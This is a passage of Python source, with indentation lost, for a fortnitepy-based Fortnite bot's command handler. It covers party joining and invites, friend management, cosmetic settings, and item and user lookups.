await reply(message, client, l('error_while_joining_to_party'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"{l('enter_to_join_party')}"
await reply(message, client, text)
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_full_or_already_or_offline'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_notfound'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_private'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_joining_to_party'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['joinid']:
try:
await client.join_party(party_id=args[1])
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_full_or_already'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_notfound'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_private'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['join']}] [{l('party_id')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['leave']:
try:
await client.party.me.leave()
await reply(message, client, l('party_leave', client.party.id))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_leaving_party'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['invite']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['invite']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.has_friend(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
return
await friend.invite()
await reply(message, client, l('user_invited', name(friend), client.party.id))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
return
await friend.invite()
await reply(message, client, l('user_invited', name(friend), client.party.id))
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_full_or_already'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_sending_partyinvite'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_invite_user')}"
await reply(message, client, text)
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_full_or_already'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_sending_partyinvite'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['inviteall']:
try:
[loop.create_task(client.party.invite(inviteuser)) for inviteuser in client.invitelist]
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['message']:
try:
text = rawcontent.split(' : ')
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if text[0] in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if text[0] in str(user.display_name) and user.id != client.user.id and client.has_friend(user.id)}
try:
user = await client.fetch_user(text[0])
if user:
if client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
return
await friend.send(text[1])
await reply(message, client, l('user_sent', name(friend), text[1]))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
return
await friend.send(text[1])
await reply(message, client, l('user_sent', name(friend), text[1]))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))""" for user in users.values()
],
"variable": [
{"user": user, "text": text} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_send')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['message']}] [{l('name_or_id')}] : [{l('content')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['partymessage']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['partymessage']}] [{l('content')}]")
return
await client.party.send(rawcontent)
await reply(message, client, l('party_sent', client.party.id, rawcontent))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['sendall']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['sendall']}] [{l('content')}]")
return
tasks = {}
for client_ in loadedclients:
mes = AllMessage(rawcontent, message.author, client_, message)
task = loop.create_task(process_command(mes))
tasks[client_] = [task, mes]
await asyncio.gather(*[i[0] for i in tasks.values()])
for client_,list_ in tasks.items():
result = list_[1].result
if result.get(client_.user.id):
results = '\n'.join(result[client_.user.id])
await reply(message, client, f"[{name(client_.user)}] {results}")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['status']:
try:
client.status_ = rawcontent
await client.change_status()
await reply(message, client, l('set_to', l('status'), rawcontent))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['status']}] [{l('content')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['avatar']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['avatar']}] [ID]")
return
if len(args) > 4:
background_colors = [args[2], args[3], args[4]]
elif len(args) == 2:
background_colors = None
else:
background_colors = getattr(fortnitepy.KairosBackgroundColorPreset, args[2])
avatar = fortnitepy.Avatar(asset=args[1], background_colors=background_colors)
client.set_avatar(avatar)
await reply(message, client, l('set_to', l('avatar'), f"{args[1]}, {background_colors}"))
except AttributeError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('color_must_be'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['banner']:
try:
await client.party.me.edit_and_keep(partial(client.party.me.set_banner,args[1],args[2],client.party.me.banner[2]))
await reply(message, client, l('set_to', l('banner'), f"{args[1]}, {args[2]}"))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['banner']}] [{l('bannerid')}] [{l('color')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['level']:
try:
await client.party.me.edit_and_keep(partial(client.party.me.set_banner,client.party.me.banner[0],client.party.me.banner[1],int(args[1])))
await reply(message, client, l('set_to', l('level'), args[1]))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except ValueError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('must_be_int'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['level']}] [{l('level')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['bp']:
try:
await client.party.me.edit_and_keep(partial(client.party.me.set_battlepass_info,True,args[1],args[2],args[3]))
await reply(message, client, l('set_to', l('bpinfo'), f"{l('tier')}: {args[1]}, {l('xpboost')}: {args[2]}, {l('friendxpboost')}: {args[3]}"))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_bpinfo'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['bp']}] [{l('tier')}] [{l('xpboost')}] [{l('friendxpboost')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['privacy']:
try:
privacies = [
"privacy_public",
"privacy_friends_allow_friends_of_friends",
"privacy_friends",
"privacy_private_allow_friends_of_friends",
"privacy_private"
]
for privacy in privacies:
if args[1] in commands[privacy]:
priv = getattr(PartyPrivacy,privacy.replace("privacy_","",1).upper()).value
await client.party.set_privacy(priv)
await reply(message, client, l('set_to', l('privacy'), l(privacy.replace("privacy_","",1))))
break
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['privacy']}] [[{commands['privacy_public']}] / [{commands['privacy_friends_allow_friends_of_friends']}] / [{commands['privacy_friends']}] / [{commands['privacy_private_allow_friends_of_friends']}] / [{commands['privacy_private']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['getuser']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['getuser']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id}
try:
user = await client.fetch_user(rawcontent)
if user:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
text = str()
for user in users.values():
text += f'\n{name(user)}'
send(display_name,text)
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['getfriend']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['getfriend']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.has_friend(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
text = str()
for user in users.values():
friend = client.get_friend(user.id)
if not friend:
return
if not friend.nickname:
text += f'\n{str(friend.display_name)} / {friend.id}'
else:
text += f'\n{friend.nickname}({str(friend.display_name)}) / {friend.id}'
if friend.last_presence and friend.last_presence.avatar:
text += f"\n{l('avatar')}: {friend.last_presence.avatar.asset}"
if friend.last_logout:
text += "\n{1}: {0.year}/{0.month}/{0.day} {0.hour}:{0.minute}:{0.second}".format(friend.last_logout, l('lastlogin'))
send(display_name,text)
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['getpending']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['getpending']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.is_pending(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.is_pending(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.is_pending(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
text = str()
for user in users.values():
pending = client.get_pending_friend(user.id)
if not pending:
return
text += f'\n{str(pending.display_name)} / {pending.id}'
send(display_name,text)
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['getblock']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['getblock']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.is_blocked(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.is_blocked(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.is_blocked(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
text = str()
for user in users.values():
block = client.get_blocked_user(user.id)
if not block:
return
text += f'\n{str(block.display_name)} / {block.id}'
send(display_name,text)
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['info']:
try:
if args[1] in commands['info_party']:
text = str()
text += f"{client.party.id}\n{l('member_count')}: {client.party.member_count}\n{client.party.playlist_info[0]}"
for member in client.party.members:
client.add_cache(member)
if data['loglevel'] == 'normal':
text += f'\n{str(member.display_name)}'
else:
text += f'\n{str(member.display_name)} / {member.id}'
send(display_name,text)
await reply(message, client, text)
if data['loglevel'] == 'debug':
send(display_name,json.dumps(client.party.meta.schema,indent=4),yellow,add_d=lambda x:f'```\n{x}\n```')
elif True in [args[1] in commands[key] for key in ("cid", "bid", "petcarrier", "pickaxe_id", "eid", "emoji_id", "toy_id", "id")]:
type_ = convert_to_type(args[1])
if rawcontent2 == '':
await reply(message, client, f"[{commands[convert_to_old_type(type_)]}] [ID]")
return
result = await loop.run_in_executor(None, search_item, data["search-lang"], "id", rawcontent2, type_)
if not result and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "id", rawcontent2, type_)
if not result:
await reply(message, client, l('item_notfound'))
else:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
await reply(message, client, f"{convert_backend_type(result[0]['backendType'])}: {result[0]['name']} | {result[0]['id']}\n{result[0]['description']}\n{result[0]['rarity']}\n{result[0]['set']}")
else:
text = str()
for count, item in enumerate(result):
text += f"\n{count+1} {convert_backend_type(item['backendType'])}: {item['name']} | {item['id']}"
text += f"\n{l('enter_to_show_info')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
await reply(message, client, f"{convert_backend_type(item['backendType'])}: {item['name']} | {item['id']}\n{item['description']}\n{item['rarity']}\n{item['set']}")""" for item in result
],
"variable": [
{"item": item} for item in result
]
}
elif True in [args[1] in commands[key] for key in ("outfit", "backpack", "pet", "pickaxe", "emote", "emoji", "toy", "item")]:
type_ = convert_to_type(args[1])
if rawcontent2 == '':
await reply(message, client, f"[{commands[convert_to_old_type(type_)]}] [{l('itemname')}]")
return
result = await loop.run_in_executor(None, search_item, data["search-lang"], "name", rawcontent2, type_)
if not result and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "name", rawcontent2, type_)
if not result:
await reply(message, client, l('item_notfound'))
else:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
await reply(message, client, f"{convert_backend_type(result[0]['backendType'])}: {result[0]['name']} | {result[0]['id']}\n{result[0]['description']}\n{result[0]['rarity']}\n{result[0]['set']}")
else:
text = str()
for count, item in enumerate(result):
text += f"\n{count+1} {convert_backend_type(item['backendType'])}: {item['name']} | {item['id']}"
text += f"\n{l('enter_to_show_info')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
await reply(message, client, f"{convert_backend_type(item['backendType'])}: {item['name']} | {item['id']}\n{item['description']}\n{item['rarity']}\n{item['set']}")""" for item in result
],
"variable": [
{"item": item} for item in result
]
}
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['info']}] [[{commands['info_party']}] / [{commands['item']}] / [{commands['id']}] / [{commands['outfit']}] / [{commands['backpack']}] / [{commands['pickaxe']}] / [{commands['emote']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['pending']:
try:
pendings = []
for pending in client.pending_friends:
client.add_cache(pending)
if pending.incoming:
pendings.append(pending)
if args[1] in commands['true']:
for pending in pendings:
try:
await pending.accept()
await reply(message, client, l('add_friend', f'{str(pending.display_name)} / {pending.id}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_sending_friendrequest'))
return
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
elif args[1] in commands['false']:
for pending in pendings:
try:
await pending.decline()
await reply(message, client, l('friend_request_decline', f'{str(pending.display_name)} / {pending.id}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_declining_friendrequest'))
return
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['pending']}] [[{commands['true']}] / [{commands['false']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removepending']:
try:
pendings = []
for pending in client.pending_friends:
client.add_cache(pending)
if pending.outgoing:
pendings.append(pending)
for pending in pendings:
try:
await pending.cancel()
await reply(message, client, l('remove_pending', f'{str(pending.display_name)} / {pending.id}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_removing_friendrequest'))
return
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addfriend']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['addfriend']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and not client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and not client.has_friend(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if not client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache( user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if client.has_friend(user.id):
await reply(message, client, l('already_friend'))
return
await client.add_friend(user.id)
await reply(message, client, l('friend_request_to', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if client.has_friend(user.id):
await reply(message, client, l('already_friend'))
return
await client.add_friend(user.id)
await reply(message, client, l('friend_request_to', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_sending_friendrequest'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_send_friendrequest')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_sending_friendrequest'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removefriend']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['removefriend']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.has_friend(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if not client.has_friend(user.id):
await reply(message, client, l('not_friend_with_user'))
return
await client.remove_or_decline_friend(user.id)
await reply(message, client, l('remove_friend', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if not client.has_friend(user.id):
await reply(message, client, l('not_friend_with_user'))
return
await client.remove_or_decline_friend(user.id)
await reply(message, client, l('remove_friend', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_removing_friend')""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_remove_friend')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_removing_friend'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removeallfriend']:
try:
friend_count = len(client.friends)
await client.remove_all_friends()
await reply(message, client, l('remove_allfriend',friend_count))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_removing_friend'))
except Exception:
send(name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['remove_offline_for']:
try:
kwargs = {}
kwargs["days"] = int(args[1])
kwargs["hours"] = int(args[2]) if args[2:3] else 0
kwargs["minutes"] = int(args[3]) if args[3:4] else 0
offline_for = datetime.timedelta(**kwargs)
utcnow = datetime.datetime.utcnow()
event = asyncio.Event(loop=loop)
removed = []
async def _(friend: fortnitepy.Friend):
last_logout = None
if friend.last_logout:
last_logout = friend.last_logout
elif friend.created_at > client.booted_utc:
last_logout = await friend.fetch_last_logout()
if last_logout and ((utcnow - last_logout) > offline_for):
if event.is_set():
await event.wait()
try:
await friend.remove()
except fortnitepy.HTTPException as e:
if e.message_code != "errors.com.epicgames.common.throttled":
raise
if "Operation access is limited by throttling policy" not in e.message:
raise
event.set()
await asyncio.sleep(int(e.message_vars[0]) + 1)
await friend.remove()
event.clear()
removed.append(friend)
max_worker = 5
worker = 0
def dec(*args):
nonlocal worker
worker -= 1
tasks = []
val = len(client.friends)
for num,friend in enumerate(client.friends):
if worker >= max_worker:
await asyncio.wait(tasks, return_when=asyncio.FIRST_COMPLETED)
worker += 1
task = loop.create_task(_(friend))
task.add_done_callback(dec)
tasks.append(task)
await asyncio.gather(*tasks)
await reply(message, client, l('remove_allfriend',len(removed)))
await asyncio.sleep(2)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_removing_friend'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['remove_offline_for']}] [{l('day')}] [{l('hour')}]({l('optional')}) [{l('minute')}]({l('optional')})")
except Exception:
send(name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['acceptpending']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['acceptpending']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.is_pending(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.is_pending(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.is_pending(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
